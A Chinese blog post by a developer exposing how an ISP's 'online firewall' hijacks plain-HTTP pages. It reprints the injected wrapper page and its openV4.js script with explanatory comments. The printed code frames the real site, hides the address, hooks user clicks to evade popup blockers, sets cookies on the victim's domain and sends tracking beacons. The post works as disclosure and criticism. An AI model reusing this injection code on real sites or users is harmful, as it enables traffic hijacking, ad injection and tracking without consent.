现在的互联网,有资源的企业蹂躏客户似乎已成为流行,不管愿不愿意,只要他认为OK,那总是要蹂躏一番的。这行当的领军人物360就不用说了,以蹂躏用户出身的——虽然现在的360产品用户体验真的不错!但却怎么也脱不了背地里的那些肮脏勾当。今天又发现一个让我无语的产品——电信在线防火墙!电信的劫持是老调重弹了。在线防火墙是收费的(8元/月),咱没交钱,本该享受不了的。但它却用这个东西来给我推送信息(这次给我推的是回访,虽然厌恶,但比广告好那么些)。
本来如果他做的好些,我是应该没有机会发现的,遗憾的是,他里面这些个IP有的时候竟然无法访问,导致请求不到数据,直接让我白屏了。放其他网站上,也许我会说:'这网站做的真垃圾,老白屏,错误都不给个' —— 在今天以前,出现这种情况,我是这个想法的。不过,今天发现自己开发的网站,也出现这种情况,怎么可能?!查看下源代码,看到了下面的内容,这... 还是我的网站么?
<!-- Page the ISP's "online firewall" returned in place of the requested site (annotated copy; see the post above). -->
<html>
<head>
<meta http-equiv="pragma" content="no-cache">
<meta http-equiv="expires" content="-1">
<script>
// NOTE: the comments in this listing were added by MitchellChu; the injected page had none. Parameters have been altered.
// Tracking endpoint. Its "|"-separated p= value is reused by openV4.js as a cookie name (checkpop) and as the source of iPid (getPid).
var stat_path='http://61.145.194.131:81/stat.aspx?p=1347347|5883|235|0|0|0';
var cnt_path='';
// Rewrites the status bar every 200 ms (string-eval'd timer) with this page's own URL so the user does not notice the framed site.
window.setInterval('window.status=location.href', 200);
</script>
</head>
<!-- The screen_capture_injected attribute is probably from a browser extension on the author's machine, not from the injector - unverified. -->
<body scroll="no" style="border:0; margin:0; padding:0;" id="mainbody" screen_capture_injected="true">
<iframe src="about:blank" width="100%" height="100%" frameborder="0">
</iframe>
<!-- Helper script (listed below as openV4.js), fetched over plain HTTP from a bare IP. -->
<script language="JavaScript" src="http://218.16.103.69:1010/openV4.js"></script>
<script language="JavaScript">
// Survey ("revisit") page opened in the popup; substituting an ad URL turns the same mechanism into ad injection.
// "¶m" is most likely "&param" mangled by HTML-entity decoding (&para;) when the post was published.
var content='http://59.37.54.194:3606/111223/RestoreRevisit.aspx?p=1347347|5883|235|0|0|0¶m=here_is_some_web_info_id';
// The URL the author actually requested, with a number appended (domain altered for the post).
var old_url='http://myDomainNameHere.com/resourcePath?1347347';
// Popup "width|height|slot" consumed by getParams() in openV4.js (slot 1-9 = screen grid position).
var param='350|250|9';
// checkpop() also writes a frequency-cap cookie on this origin and sets iPid as side effects.
if(checkpop(stat_path)){
try{
OpenWin(content,stat_path,cnt_path,old_url);
}catch(e){}
}
else{
// Push already shown (cookie present) or cookies unusable: just go to the real page.
location.href = old_url;
}
</script>
</body>
</html>
上面的代码中,我半点自己网站的影子也没有找到,能看到和我网站有关系的也就是变量old_url了,里面存放的是我要访问的原始地址。初步看起来,应该做了统计和信息推送,RestoreRevisit.aspx,这个是回访——本次推送内容。需要注意的是,这个页面是直接以我网站的地址返回给浏览器的,所以它里面的脚本和后面被装进iframe的真实页面是同源的:它可以在我网站的域下读写cookie(checkpop用统计参数当cookie名来做频率控制),也可以直接给iframe里的页面挂点击事件(CheckAd/OnClick)。这其中checkpop在openv4.js里面,代码如下:
// Shared state for openV4.js. Everything is a global; the wrapper page that loads
// this script additionally defines stat_path, cnt_path, content, old_url and param.

// Poll timers: hInterval drives CheckAd() (framed document), hPInterval drives
// PCheckAd() (parent document when the wrapper itself is framed).
var hInterval = null;
var hPInterval = null;

// body.onclick handlers that were in place before hooking; restored after the
// popup has been shown.
var fOldClick = null;
var fPOldClick = null;

// User-agent sniff result and the "popup already opened" latch.
var IsFirefox = false;
var isAlreadyShow = false;

// Popup geometry: requested size, 1-9 grid slot, and the computed screen position.
var iWidth = 0;
var iHeight = 0;
var iPos = 1;
var posLeft = 0;
var posTop = 0;

// Push id parsed from stat_path by getPid(); doubles as the frequency-cap cookie name.
var iPid = 0;

// window.open feature string assembled by calPosition().
var styles = "";
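///<summary>
///Parse the global "width|height|slot" string `param` (defined by the wrapper page)
///into the globals iWidth, iHeight and iPos. Any field that is missing or not a
///number - and the case where `param` itself is not defined - falls back to the
///320x240 / slot 1 defaults instead of leaking NaN into calPosition().
///Fixes: the original split `param` outside its try/catch (so an undefined `param`
///threw instead of defaulting) and relied on parseInt throwing, which it never does.
///</summary>
function getParams()
{
    var w = NaN;
    var h = NaN;
    var p = NaN;
    try
    {
        // Reading an undefined global throws ReferenceError; keep it inside the try.
        var fields = String(param).split("|");
        w = parseInt(fields[0], 10);
        h = parseInt(fields[1], 10);
        p = parseInt(fields[2], 10);
    }
    catch(e)
    {
        // Fall through to the defaults below.
    }
    // parseInt signals failure with NaN, not an exception, so check each field.
    iWidth = isNaN(w) ? 320 : w;
    iHeight = isNaN(h) ? 240 : h;
    iPos = isNaN(p) ? 1 : p;
}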
function calPosition()
{
var docHeight = window.screen.height;
var docWidth = window.screen.width;
//divide into 9 parts
var perWid = Math.round(docWidth / 3);
var perHei = Math.round(docHeight / 3);
switch(iPos)
{
case 1 :
posLeft = 0;
posTop = 0;
break;
case 2 :
posLeft = 0;
posTop = perHei;
break;
case 3 :
posLeft = 0;
posTop = perHei * 2;
break;
case 4 :
posLeft = perWid;
posTop = 0;
break;
case 5 :
posLeft = Math.round((docWidth - iWidth) / 2);
posTop = Math.round((docHeight - iHeight) / 2);
break;
case 6 :
posLeft = perWid;
posTop = perHei * 2;
break;
case 7 :
posLeft = perWid * 2;
posTop = 0;
break;
case 8 :
posLeft = perWid * 2;
posTop = perHei;
break;
case 9 :
posLeft = perWid * 2;
posTop = perHei * 2;
break;
default:
posLeft = perWid;
posTop = perHei;
break;
}
var leftAddwidth = parseInt(posLeft,10) + parseInt(iWidth,10);
var docWidMinusiWid = parseInt(docWidth,10) - parseInt(iWidth,10);
posLeft = leftAddwidth > parseInt(docWidth,10) ? (docWidMinusiWid > 0 ? docWidMinusiWid : 0) : (parseInt(posLeft,10));
var topAddheight = parseInt(posTop,10) + parseInt(iHeight,10);
var docHeiMinusiHei = parseInt(docHeight,10) - parseInt(iHeight,10);
posTop = topAddheight > parseInt(docHeight,10) ? (docHeiMinusiHei > 0 ? docHeiMinusiHei : 0) : (parseInt(posTop,10));
styles = "width="+iWidth+",height="+iHeight+",left="+posLeft+",top="+posTop;
}
///<summary>
///Click handler installed on the *parent* document by PCheckAd() (used when this
///wrapper is itself inside a frame). On the first click it opens the popup - calling
///window.open from inside a user click, presumably so popup blockers that stopped
///OpenWin()'s direct attempt let it through - fires the tracking beacons, and sets
///a cookie named after iPid on the current document so the popup is not repeated.
///It then calls the click handler it displaced and unhooks itself.
///</summary>
function pOnClick()
{
if(!isAlreadyShow)
{
// Frequency cap. The cookie lives in the cookie jar of whatever origin this
// page was served on, i.e. the hijacked site's domain.
if (GetCookie(String(iPid))==null)
{
if (!styles)
{
// Fallback geometry. The trailing comma differs from OnClick(); presumably the
// feature-string parser ignores it.
styles = "width=320, height=240, left=200, top=150,";
}
var h = window.open(content, "_blank", styles +
" ,directories=0, location=0, " +
"menubar=0, resizable=0, scrollbars=0, status=0, titlebar=0, toolbar=0");
if (h)
{
isAlreadyShow = true;
// Tracking beacons via Image(): no DOM insertion needed, the request is enough.
var img = new Image();
var imgstat = new Image();
img.src = stat_path+"&c=1";
imgstat.src = cnt_path;
}
// SetCookie() interprets expires as hours, so 0.5 = 30 minutes. Set even when the
// popup was blocked (h falsy).
SetCookie(iPid, iPid, { expires: 0.5, path: '/' });
}
// Chain to the displaced handler, then restore it and remove ourselves.
if (null!=fPOldClick)
{
fPOldClick();
}
var parentDoc = parent.document;
if (IsFirefox)
{
// Capture flag matches the addEventListener(..., true) in PCheckAd().
parentDoc.removeEventListener("click", pOnClick, true);
if (fPOldClick)
{
parentDoc.addEventListener("click", fPOldClick, true);
}
}
else
{
parentDoc.body.onclick = fPOldClick;
}
}
}
///<summary>
///Click handler installed on the framed (real) site's document by CheckAd().
///Same logic as pOnClick(): on the first click open the popup from within the user
///gesture, fire the beacons, set the iPid frequency-cap cookie, call the displaced
///handler, then unhook. The two functions are copy-pasted and differ only in which
///document they touch.
///NOTE(review): on Firefox this removes the listener with capture=true, but
///CheckAd() added it with capture=false, so the removal does not match and the
///handler is never removed; while the popup stays blocked (isAlreadyShow false)
///every further click re-adds fOldClick as an extra listener.
///</summary>
function OnClick()
{
if(!isAlreadyShow)
{
// Frequency cap; the cookie is written under the hijacked site's origin.
if (GetCookie(String(iPid)) == null)
{
if (!styles)
{
styles = "width=320, height=240, left=200, top=150";
}
var h = window.open(content, "_blank", styles +
" ,directories=0, location=0, " +
"menubar=0, resizable=0, scrollbars=0, status=0, titlebar=0, toolbar=0");
if (h)
{
isAlreadyShow = true;
// Tracking beacons.
var img = new Image();
var imgstat = new Image();
img.src = stat_path+"&c=1";
imgstat.src = cnt_path;
}
// expires is in hours here: 0.5 = 30 minutes. Set regardless of whether the popup opened.
SetCookie(iPid, iPid, { expires: 0.5, path: '/' });
}
// Chain to the displaced handler, then try to restore it and remove ourselves.
if (null!=fOldClick)
{
fOldClick();
}
if (IsFirefox)
{
// See NOTE above: capture flag does not match CheckAd()'s addEventListener(..., false).
window.frames[0].document.removeEventListener("click", OnClick, true);
if (fOldClick)
{
window.frames[0].document.addEventListener("click", fOldClick, true);
}
}
else
{
window.frames[0].document.body.onclick = fOldClick;
}
}
}
///<summary>
///Interval callback (see OpenWin) that hooks the *parent* document when this
///wrapper is itself framed. Once the parent is loaded it saves the existing
///body.onclick, installs pOnClick, and retargets every link and form without an
///explicit target to "_top" so that the next navigation replaces the whole window.
///Any failure (e.g. a cross-origin parent, or no attachEvent on non-IE browsers)
///is swallowed and the interval is cleared anyway, so the hook is attempted once.
///NOTE(review): the readyState read below happens before the try, so on a
///cross-origin parent in the non-Firefox branch it throws every tick and the
///interval is never cleared.
///</summary>
function PCheckAd()
{
var win = parent;
if (!IsFirefox)
{
// Wait for the parent to finish loading before touching its body.
if (win.document.readyState != 'complete')
{
return;
}
}
try
{
var doc = win.document;
// Remember the inline handler so pOnClick() can chain to it and restore it.
fPOldClick = doc.body.onclick;
if (IsFirefox)
{
doc.addEventListener("click",pOnClick,true);
}
else
{
// attachEvent adds a listener rather than replacing body.onclick, so the saved
// handler still fires on its own and pOnClick() invokes it a second time.
doc.body.attachEvent("onclick", pOnClick);
// doc.body.onclick = pOnClick;
}
// for...in over an HTMLCollection also yields non-element properties (length, item,
// ...); their .target is undefined, so the == "" test skips them.
for (var i in doc.links)
{
if (doc.links[i].target == "")
{
doc.links[i].target = "_top";
}
}
for (var i in doc.forms)
{
if (doc.forms[i].target == "")
{
doc.forms[i].target = "_top";
}
}
}
catch(e)
{
// Best effort: a cross-origin parent or a missing attachEvent ends up here.
}
window.clearInterval(hPInterval);
}
///<summary>
///Interval callback (see OpenWin) that hooks the real site once it has loaded in
///the wrapper's iframe (window.frames[0]). Saves the framed document's
///body.onclick, installs OnClick, and retargets links/forms without a target to
///"_top" so the user's next navigation escapes the iframe. This only works because
///the wrapper was served on the hijacked site's own URL, making the frame
///same-origin. Errors are swallowed and the interval is cleared regardless.
///NOTE(review): as in PCheckAd(), the readyState check runs outside the try.
///</summary>
function CheckAd()
{
var win = window.frames[0];
if (!IsFirefox)
{
// Wait until the framed page has finished loading.
if (win.document.readyState != 'complete')
{
return;
}
}
try
{
var doc = win.document;
// Remember the inline handler so OnClick() can chain to it and restore it.
fOldClick = doc.body.onclick;
if (IsFirefox)
{
// Registered with capture=false; OnClick() later tries to remove it with capture=true.
doc.addEventListener("click", OnClick, false);
}
else
{
// attachEvent adds a listener, so the saved body.onclick keeps firing as well.
doc.body.attachEvent("onclick", OnClick);
//doc.body.onclick = OnClick;
}
// for...in over an HTMLCollection also visits non-element properties; their
// undefined .target fails the == "" test and they are skipped.
for (var i in doc.links)
{
if (doc.links[i].target == "")
{
doc.links[i].target = "_top";
}
}
for (var i in doc.forms)
{
if (doc.forms[i].target == "")
{
doc.forms[i].target = "_top";
}
}
}
catch(e)
{
// Best effort; nothing is hooked if the frame cannot be reached.
}
window.clearInterval(hInterval);
hInterval = null;
}
///<summary>
///Entry point called by the wrapper page after checkpop() succeeded.
///  popurl   - page to show in the popup (the "revisit" survey / ad)
///  staturl  - tracking beacon URL (stat_path)
///  counturl - second beacon URL (cnt_path, empty in the captured page)
///  curl     - the URL the user originally requested
///Strategy: first try window.open() directly; if it succeeded, fire both beacons
///and send this window on to the real URL. If it was blocked, load the real site
///into the wrapper's iframe instead and poll CheckAd() (and PCheckAd() when the
///wrapper is itself framed) to hook the user's first click, from which OnClick()
///retries the popup inside a user gesture. The wrapper page's address bar keeps
///showing the original URL the whole time.
///</summary>
function OpenWin(popurl,staturl,counturl,curl)
{
getParams();
calPosition();
// NOTE: calPosition() leaves `styles` ending in "top=N" and the next fragment starts
// with a space, not a comma, so "top=N directories=0" is one malformed token here
// (OnClick()/pOnClick() use " ,directories=0" instead). Browsers may ignore it.
var h = window.open(popurl, "_blank", styles +
" directories=0, location=0, " +
"menubar=0, resizable=0, scrollbars=0, status=0, titlebar=0, toolbar=0");
if (h)
{
// Popup was allowed without a user gesture: beacon, then leave the wrapper.
var img = new Image();
img.src = staturl;
var imgcount = new Image();
imgcount.src = counturl;
location.href = curl;
return;
}
// Popup blocked: fall back to the click-hook path.
if (navigator.userAgent.indexOf("Firefox")!=-1)
{
IsFirefox = true;
}
// If the wrapper is itself inside a frame, also hook the parent document.
if (top.location != self.location)
{
if (IsFirefox)
{
hPInterval = window.setInterval("PCheckAd()", 1000);
}
else
{
hPInterval = window.setInterval("PCheckAd()", 100);
}
//location.href = old_url;
}
// Defensive only: calPosition() always assigns `styles`, so this should not trigger.
if (!styles)
{
styles = "width=320, height=240, left=200, top=150";
}
// Expect exactly the one iframe from the wrapper page.
if (window.frames.length!=1)
{
return;
}
// Load the real site into the iframe (same origin, since this page was served on
// the site's own URL) and poll until it can be hooked.
window.frames[0].location = curl;
if (IsFirefox)
{
hInterval = window.setInterval("CheckAd()", 1000);
}
else
{
hInterval = window.setInterval("CheckAd()", 100);
}
}
///<summary>
///Strip leading and trailing whitespace. null, undefined and "" all yield "".
///</summary>
function trim(text)
{
    var s = text || "";
    return s.replace(/^\s+/, "").replace(/\s+$/, "");
}
///<summary>
///Return the URI-decoded value of cookie `name` from document.cookie, or null
///when no cookie of that exact name exists. Matching is on "name=" at the start of
///each ";"-separated, whitespace-trimmed entry; the first hit wins.
///</summary>
function GetCookie(name) {
    var found = null;
    var jar = document.cookie;
    var entries = (jar && jar != '') ? jar.split(';') : [];
    for (var k = 0; k < entries.length && found === null; k++) {
        var entry = entries[k].replace(/^\s+|\s+$/g, "");
        if (entry.substring(0, name.length + 1) == (name + '=')) {
            found = decodeURIComponent(entry.substring(name.length + 1));
        }
    }
    return found;
}
///<summary>
///Write a cookie via document.cookie.
///  name    - cookie name (numbers are stringified)
///  value   - stored URI-encoded; null means "delete": value becomes "" and
///            options.expires is set to -1 (mutating the caller's object)
///  options - { expires, path, domain, secure }. expires is either a Date or a
///            number of HOURS from now (note the 60*60*1000 multiplier; this is
///            not "days" as the jQuery-cookie-style signature might suggest).
///</summary>
function SetCookie(name, value, options) {
    var opts = options || {};
    var val = value;
    if (val === null) {
        val = '';
        opts.expires = -1;
    }

    var exp = opts.expires;
    var expiresPart = '';
    if (exp && (typeof exp == 'number' || exp.toUTCString)) {
        var when = (typeof exp == 'number')
            ? new Date(new Date().getTime() + exp * 60 * 60 * 1000)
            : exp;
        expiresPart = '; expires=' + when.toUTCString();
    }
    var pathPart = opts.path ? '; path=' + opts.path : '';
    var domainPart = opts.domain ? '; domain=' + opts.domain : '';
    var securePart = opts.secure ? '; secure' : '';

    document.cookie = name + '=' + encodeURIComponent(val) + expiresPart + pathPart + domainPart + securePart;
}
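///<summary>
///Return the part of srcstr after its first "=", or the whole string when there is
///no "=" (indexOf() returns -1, so the start offset becomes 0). checkpop() uses it
///to turn "...stat.aspx?p=1347347|..." into the cookie name "1347347|...".
///Fix: the start offset was an undeclared variable (implicit global `c_start`),
///which leaks into the page and throws in strict-mode code.
///</summary>
function getparam(srcstr)
{
    var start = srcstr.indexOf("=") + 1;
    return srcstr.substring(start);
}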
///<summary>
///Frequency cap for the push. Returns true only when cookies are enabled, no cookie
///named after the "=" tail of `arradd` (the stat URL's p= value) exists yet, and
///writing that cookie (24 hours, path "/") on the current document can be read back.
///Side effects: writes that cookie on the hijacked site's origin, and - unless cookies
///are disabled - records the push id via getPid(arradd) whatever the outcome.
///Any exception yields false.
///</summary>
function checkpop(arradd) {
    if (!navigator.cookieEnabled) {
        return false;
    }
    var allowed;
    try {
        var key = getparam(arradd);
        if (GetCookie(key) != null) {
            // Already shown within the cookie's lifetime.
            allowed = false;
        } else {
            SetCookie(key, key, { expires: 24, path: '/' });
            // Confirm the write actually stuck (cookies may be blocked per site).
            allowed = (GetCookie(key) != null);
        }
    } catch (err) {
        allowed = false;
    }
    getPid(arradd);
    return allowed;
}
///<summary>
///Set the global iPid from the third "|"-separated field of `arradd` (for the
///captured stat URL "...?p=1347347|5883|235|..." that is 235). iPid becomes 0 only
///if parsing throws; since parseInt returns NaN rather than throwing, a missing or
///non-numeric field leaves iPid = NaN. A non-string `arradd` throws to the caller.
///</summary>
function getPid(arradd)
{
    var fields = arradd.split("|");
    var id;
    try
    {
        id = parseInt(fields[2], 10);
    }
    catch (e)
    {
        id = 0;
    }
    iPid = id;
}
从整体上来看,电信是使用在线防火墙来进行推送信息的,这防火墙是什么东西呢?
从他的说明来看,是多么的为咱们着想,为我们的浏览安全可是尽了十万分的力了。只是我纳闷的是,好好的网站,他动不动的劫持一下,给咱改改请求,给咱弹弹小窗。它本身是不是恶意代码?从行为上看,它做的事情和典型的中间人/广告木马没有区别:用定时改写状态栏来掩盖地址,把真实网站装进iframe,先直接弹窗,被拦截后就挂住用户的第一次点击再弹(借用户点击绕过弹窗拦截),还在被劫持网站的域下写cookie;脚本和统计、推送地址全部是裸IP加明文HTTP。也正因为是明文注入,网站只要用HTTPS,这类劫持就插不进来。这个值得思考!